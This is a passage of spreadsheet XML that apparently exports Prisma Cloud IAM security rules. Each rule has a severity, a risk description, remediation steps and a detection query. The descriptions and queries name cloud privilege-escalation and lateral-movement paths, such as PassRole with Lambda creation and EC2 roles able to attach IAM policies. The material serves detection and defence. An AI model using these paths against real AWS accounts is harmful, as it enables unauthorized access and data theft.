          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'lambda' AND action.name in ('lambda:InvokeFunction', 'lambda:InvokeFunctionUrl') and grantedby.cloud.policy.type = 'Resource-based Policy' and dest.cloud.resource.type = 'function' AND grantedby.cloud.policy.condition ( 'lambda:EventSourceToken' ) does not exist AND grantedby.cloud.policy.condition ( 'lambda:FunctionUrlAuthType' ) != 'AWS_IAM'</t>
        </is>
      </c>
      <c r="AA3137" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3137" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3137" t="inlineStr"/>
      <c r="AD3137" t="b">
        <v>1</v>
      </c>
      <c r="AE3137" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3137" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>186ff062-c51d-4115-bd4b-918415abaed2</t>
        </is>
      </c>
      <c r="AI3137" t="inlineStr">
        <is>
          <t>186ff062-c51d-4115-bd4b-918415abaed2</t>
        </is>
      </c>
      <c r="AJ3137" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3137" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3138">
      <c r="A3138" t="inlineStr"/>
      <c r="B3138" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3138" s="2" t="inlineStr"/>
      <c r="D3138" t="n">
        <v>0</v>
      </c>
      <c r="E3138" t="n">
        <v>0</v>
      </c>
      <c r="F3138" t="n">
        <v>1</v>
      </c>
      <c r="G3138" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3138" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3138" t="inlineStr">
        <is>
          <t>Third-party service account with a Lateral Movement to Data Services Through Redshift Cluster Creation</t>
        </is>
      </c>
      <c r="L3138" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3138" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3138" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3138" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3138" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3138" t="inlineStr"/>
      <c r="R3138" t="inlineStr"/>
      <c r="S3138" t="inlineStr"/>
      <c r="T3138" t="b">
        <v>1</v>
      </c>
      <c r="U3138" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3138" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3138" t="inlineStr">
        <is>
          <t>This policy identifies and mitigates risky behavior where third-party vendors, can create Amazon Redshift clusters and pass IAM roles without 'iam:PassedToService' constraint. Such permissions may allow adversaries to leverage Redshift’s Default Role and Redshift commands for example 'COPY', enabling lateral movement within your AWS environment. This unauthorized access to sensitive resources through newly established Redshift clusters can compromise data confidentiality and manipulate or expose your cloud infrastructure to potential breaches.</t>
        </is>
      </c>
      <c r="X3138" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2. Navigate to the IAM pane, and search for the relevant role
 3. Remove the third-party account from the role's trust policy to revoke its access to the role.</t>
        </is>
      </c>
      <c r="Y313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38" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'redshift:CreateCluster') and grantedby.cloud.entity.type = 'role' AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist AND source.cloud.account.isvendor = true</t>
        </is>
      </c>
      <c r="AA3138" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3138" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3138" t="inlineStr"/>
      <c r="AD3138" t="b">
        <v>1</v>
      </c>
      <c r="AE3138" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3138" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>228230b4-371a-4d75-9bce-10ffd586a446</t>
        </is>
      </c>
      <c r="AI3138" t="inlineStr">
        <is>
          <t>228230b4-371a-4d75-9bce-10ffd586a446</t>
        </is>
      </c>
      <c r="AJ3138" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3138" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3139">
      <c r="A3139" t="inlineStr"/>
      <c r="B3139" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3139" s="2" t="inlineStr"/>
      <c r="D3139" t="inlineStr"/>
      <c r="E3139" t="inlineStr"/>
      <c r="F3139" t="inlineStr"/>
      <c r="G3139" t="b">
        <v>1</v>
      </c>
      <c r="H31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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3139" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3139" t="inlineStr">
        <is>
          <t>AWS KMS Key is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3139" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3139" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3139" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3139" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3139" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3139" t="inlineStr"/>
      <c r="R3139" t="inlineStr"/>
      <c r="S3139" t="inlineStr"/>
      <c r="T3139" t="b">
        <v>0</v>
      </c>
      <c r="U3139" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3139" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3139" t="inlineStr">
        <is>
          <t>This policy identifies AWS KMS Keys with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3139" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS KMS Key service
3. Find resource-based policy of the AWS KMS Key resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3139" t="inlineStr"/>
      <c r="Z3139" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'kms' AND dest.cloud.resource.type = 'key' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3139" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3139" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3139" t="inlineStr"/>
      <c r="AD3139" t="b">
        <v>1</v>
      </c>
      <c r="AE3139" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3139" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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39" t="inlineStr">
        <is>
          <t>d3f44174-9183-47ab-9676-11e76cd6c9af</t>
        </is>
      </c>
      <c r="AI3139" t="inlineStr">
        <is>
          <t>d3f44174-9183-47ab-9676-11e76cd6c9af</t>
        </is>
      </c>
      <c r="AJ3139" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3139" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3140">
      <c r="A3140" t="inlineStr"/>
      <c r="B3140" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3140" s="2" t="inlineStr"/>
      <c r="D3140" t="inlineStr"/>
      <c r="E3140" t="inlineStr"/>
      <c r="F3140" t="inlineStr"/>
      <c r="G3140" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3140" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3140" t="inlineStr">
        <is>
          <t>AWS EC2 instance with privilege escalation risk permissions</t>
        </is>
      </c>
      <c r="L3140" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3140" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3140" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3140" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3140" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3140" t="inlineStr"/>
      <c r="R3140" t="inlineStr"/>
      <c r="S3140" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3140" t="b">
        <v>1</v>
      </c>
      <c r="U3140" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3140" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3140" t="inlineStr">
        <is>
          <t>With access to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permissions, an adversary can elevate the access of the EC2 instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X314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4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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 'iam:CreatePolicy', 'iam:CreatePolicyVersion', 'iam:SetDefaultPolicyVersion', 'iam:PassRole', 'iam:CreateAccessKey', 'iam:CreateLoginProfile', 'iam:UpdateLoginProfile', 'iam:AttachUserPolicy', 'iam:AttachGroupPolicy', 'iam:AttachRolePolicy', 'iam:PutUserPolicy', 'iam:PutGroupPolicy', 'iam:PutRolePolicy', 'iam:AddUserToGroup', 'iam:UpdateAssumeRolePolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3140" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3140" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3140" t="inlineStr"/>
      <c r="AD3140" t="b">
        <v>1</v>
      </c>
      <c r="AE3140" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3140" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>fa3d600e-101e-4e56-9961-6aa4baf693e4</t>
        </is>
      </c>
      <c r="AI3140" t="inlineStr">
        <is>
          <t>fa3d600e-101e-4e56-9961-6aa4baf693e4</t>
        </is>
      </c>
      <c r="AJ3140" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3140" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3141">
      <c r="A3141" t="inlineStr"/>
      <c r="B3141" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3141" s="2" t="inlineStr"/>
      <c r="D3141" t="n">
        <v>0</v>
      </c>
      <c r="E3141" t="n">
        <v>115</v>
      </c>
      <c r="F3141" t="n">
        <v>0</v>
      </c>
      <c r="G3141" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3141" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3141" t="inlineStr">
        <is>
          <t>AWS Compute Instance (EC2/Lambda) Assigned Lambda Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3141" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3141" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3141" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3141" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3141" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3141" t="inlineStr"/>
      <c r="R3141" t="inlineStr"/>
      <c r="S3141" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3141" t="b">
        <v>1</v>
      </c>
      <c r="U3141" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3141" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3141" t="inlineStr">
        <is>
          <t>An adversary able to create a Lambda Function with any role and give themselves the permissions to invoke it would be able to escalate their permissions by attaching a privileged role to the function while defining the Lambda's actions. As such, they would obtain the ability to perform actions using the permissions of the attached role, allowing further enumeration and exploitation of the environment.</t>
        </is>
      </c>
      <c r="X3141" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2.Navigate to the EC2 instance or Lambda Function, and either replace the role for a less privileged one, or remove it entirely. If the role is not in use by any other entities, you could simply remove the role's excessive permissions.</t>
        </is>
      </c>
      <c r="Y314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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:PassRole', 'lambda:CreateFunction', 'lambda:AddPermission') AND source.cloud.resource.type IN ('instance', 'function')</t>
        </is>
      </c>
      <c r="AA3141" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3141" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3141" t="inlineStr"/>
      <c r="AD3141" t="b">
        <v>1</v>
      </c>
      <c r="AE3141" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3141" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>866ca1d4-40cb-4626-afa0-5a438a92019a</t>
        </is>
      </c>
      <c r="AI3141" t="inlineStr">
        <is>
          <t>866ca1d4-40cb-4626-afa0-5a438a92019a</t>
        </is>
      </c>
      <c r="AJ3141" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3141" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3142">
      <c r="A3142" t="inlineStr"/>
      <c r="B3142" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3142" s="2" t="inlineStr"/>
      <c r="D3142" t="n">
        <v>0</v>
      </c>
      <c r="E3142" t="n">
        <v>81</v>
      </c>
      <c r="F3142" t="n">
        <v>0</v>
      </c>
      <c r="G3142" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3142" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3142" t="inlineStr">
        <is>
          <t>AWS Lambda with write permission on critical configuration for s3</t>
        </is>
      </c>
      <c r="L3142" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3142" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3142" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3142" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3142" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3142" t="inlineStr"/>
      <c r="R3142" t="inlineStr"/>
      <c r="S3142" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3142" t="b">
        <v>1</v>
      </c>
      <c r="U3142" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3142" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3142" t="inlineStr">
        <is>
          <t>This Policy identifies the permissions impact Amazon S3 (Simple Storage Service). that control object retention, lifecycle rules, access policies, and versioning. Misuse can affect data integrity, storage costs, access control, and version management.  It is recommended to assign and manage these permissions to trusted individuals to prevent unintended data loss, security risks, or unauthorized access to S3 resources.</t>
        </is>
      </c>
      <c r="X3142"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4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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('s3:PutObjectRetention','s3:PutLifecycleConfiguration','s3:PutBucketPolicy','s3:PutBucketVersioning') AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3142" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3142" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3142" t="inlineStr"/>
      <c r="AD3142" t="b">
        <v>1</v>
      </c>
      <c r="AE3142" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3142" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>da80df05-1dde-4fc0-9874-556ad59db038</t>
        </is>
      </c>
      <c r="AI3142" t="inlineStr">
        <is>
          <t>da80df05-1dde-4fc0-9874-556ad59db038</t>
        </is>
      </c>
      <c r="AJ3142" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3142" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3143">
      <c r="A3143" t="inlineStr"/>
      <c r="B3143" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3143" s="2" t="inlineStr"/>
      <c r="D3143" t="inlineStr"/>
      <c r="E3143" t="inlineStr"/>
      <c r="F3143" t="inlineStr"/>
      <c r="G3143" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3143" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3143" t="inlineStr">
        <is>
          <t>AWS Secret Manager Secret is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3143" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3143" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3143" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3143" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3143" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3143" t="inlineStr"/>
      <c r="R3143" t="inlineStr"/>
      <c r="S3143" t="inlineStr"/>
      <c r="T3143" t="b">
        <v>0</v>
      </c>
      <c r="U3143" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3143" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3143" t="inlineStr">
        <is>
          <t>This policy identifies AWS Secret Manager Secrets with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3143" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Secret Manager Secret service
3. Find resource-based policy of the AWS Secret Manager Secret  resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3143" t="inlineStr"/>
      <c r="Z3143" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'secretsmanager' and dest.cloud.resource.type = 'Secret' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3143" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3143" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3143" t="inlineStr"/>
      <c r="AD3143" t="b">
        <v>1</v>
      </c>
      <c r="AE3143" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3143" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>2083569a-28b8-4e4b-a34d-222928277107</t>
        </is>
      </c>
      <c r="AI3143" t="inlineStr">
        <is>
          <t>2083569a-28b8-4e4b-a34d-222928277107</t>
        </is>
      </c>
      <c r="AJ3143" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3143" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3144">
      <c r="A3144" t="inlineStr"/>
      <c r="B3144" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3144" s="2" t="inlineStr"/>
      <c r="D3144" t="inlineStr"/>
      <c r="E3144" t="inlineStr"/>
      <c r="F3144" t="inlineStr"/>
      <c r="G3144" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3144" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3144" t="inlineStr">
        <is>
          <t>AWS EC2 with IAM role with destruction permissions for Amazon RDS databases</t>
        </is>
      </c>
      <c r="L3144" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3144" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3144" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3144" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3144" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3144" t="inlineStr"/>
      <c r="R3144" t="inlineStr"/>
      <c r="S3144" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3144" t="b">
        <v>1</v>
      </c>
      <c r="U3144" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3144" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3144" t="inlineStr">
        <is>
          <t>Having an AWS EC2 instance with an IAM role that grants the 'rds-data:ExecuteStatement' and 'rds-data:BatchExecuteStatement' actions can be risky. This combination of permissions allows the instance to execute SQL statements directly on Amazon RDS databases. If unauthorized access or compromise occurs, it could lead to potential data breaches, unauthorized modifications, or unauthorized access to sensitive information stored in the databases.</t>
        </is>
      </c>
      <c r="X3144"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4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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('rds-data:ExecuteStatement', 'rds-data:BatchExecuteStatement') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3144" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3144" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3144" t="inlineStr"/>
      <c r="AD3144" t="b">
        <v>1</v>
      </c>
      <c r="AE3144" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3144" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>b7012430-4aa3-4ee6-ba85-7afd6c544894</t>
        </is>
      </c>
      <c r="AI3144" t="inlineStr">
        <is>
          <t>b7012430-4aa3-4ee6-ba85-7afd6c544894</t>
        </is>
      </c>
      <c r="AJ3144" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3144" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3145">
      <c r="A3145" t="inlineStr"/>
      <c r="B3145" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3145" s="2" t="inlineStr"/>
      <c r="D3145" t="n">
        <v>4</v>
      </c>
      <c r="E3145" t="n">
        <v>1</v>
      </c>
      <c r="F3145" t="n">
        <v>0</v>
      </c>
      <c r="G3145" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3145" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3145" t="inlineStr">
        <is>
          <t>AWS EC2 instance with the creation of a new Group with attached policy permission</t>
        </is>
      </c>
      <c r="L3145" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3145" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3145" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3145" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3145" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3145" t="inlineStr"/>
      <c r="R3145" t="inlineStr"/>
      <c r="S3145" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3145" t="b">
        <v>1</v>
      </c>
      <c r="U3145" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3145" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3145" t="inlineStr">
        <is>
          <t>With access to iam:CreateGroup', 'iam:AttachGroupPolicy' permissions, an adversary can elevate the access of the EC2 instance, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3145"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4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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:CreateGroup', 'iam:AttachGroupPolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3145" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3145" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3145" t="inlineStr"/>
      <c r="AD3145" t="b">
        <v>1</v>
      </c>
      <c r="AE3145" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3145" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>d713b788-5ba0-495f-b8bb-e530bec828e2</t>
        </is>
      </c>
      <c r="AI3145" t="inlineStr">
        <is>
          <t>d713b788-5ba0-495f-b8bb-e530bec828e2</t>
        </is>
      </c>
      <c r="AJ3145" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3145" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3146">
      <c r="A3146" t="inlineStr"/>
      <c r="B3146" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3146" s="2" t="inlineStr"/>
      <c r="D3146" t="n">
        <v>0</v>
      </c>
      <c r="E3146" t="n">
        <v>3</v>
      </c>
      <c r="F3146" t="n">
        <v>0</v>
      </c>
      <c r="G3146" t="b">
        <v>1</v>
      </c>
      <c r="H31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46" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3146" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3146" t="inlineStr">
        <is>
          <t>Service Account with Cross Cloud Administrative Access</t>
        </is>
      </c>
      <c r="L3146" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3146" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3146" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3146" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3146" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3146" t="inlineStr"/>
      <c r="R3146" t="inlineStr"/>
      <c r="S3146" t="inlineStr"/>
      <c r="T3146" t="b">
        <v>1</v>
      </c>
      <c r="U3146" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3146" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3146" t="inlineStr">
        <is>
          <t>Identifies service accounts with permissions to assume an administrative role in another account hosted in a different cloud vendor environment. \nAdministrative permissions can result in the compromising of the security posture of your organization.\nAs the service account resides in a separate cloud vendor's environment, a compromise of the source account could lead to lateral movement exposing the second account and enlarging the blast radius across cloud provider environments.</t>
        </is>
      </c>
      <c r="X3146" t="inlineStr">
        <is>
          <t>How to investigate? 
1. Sign in to the AWS Console 
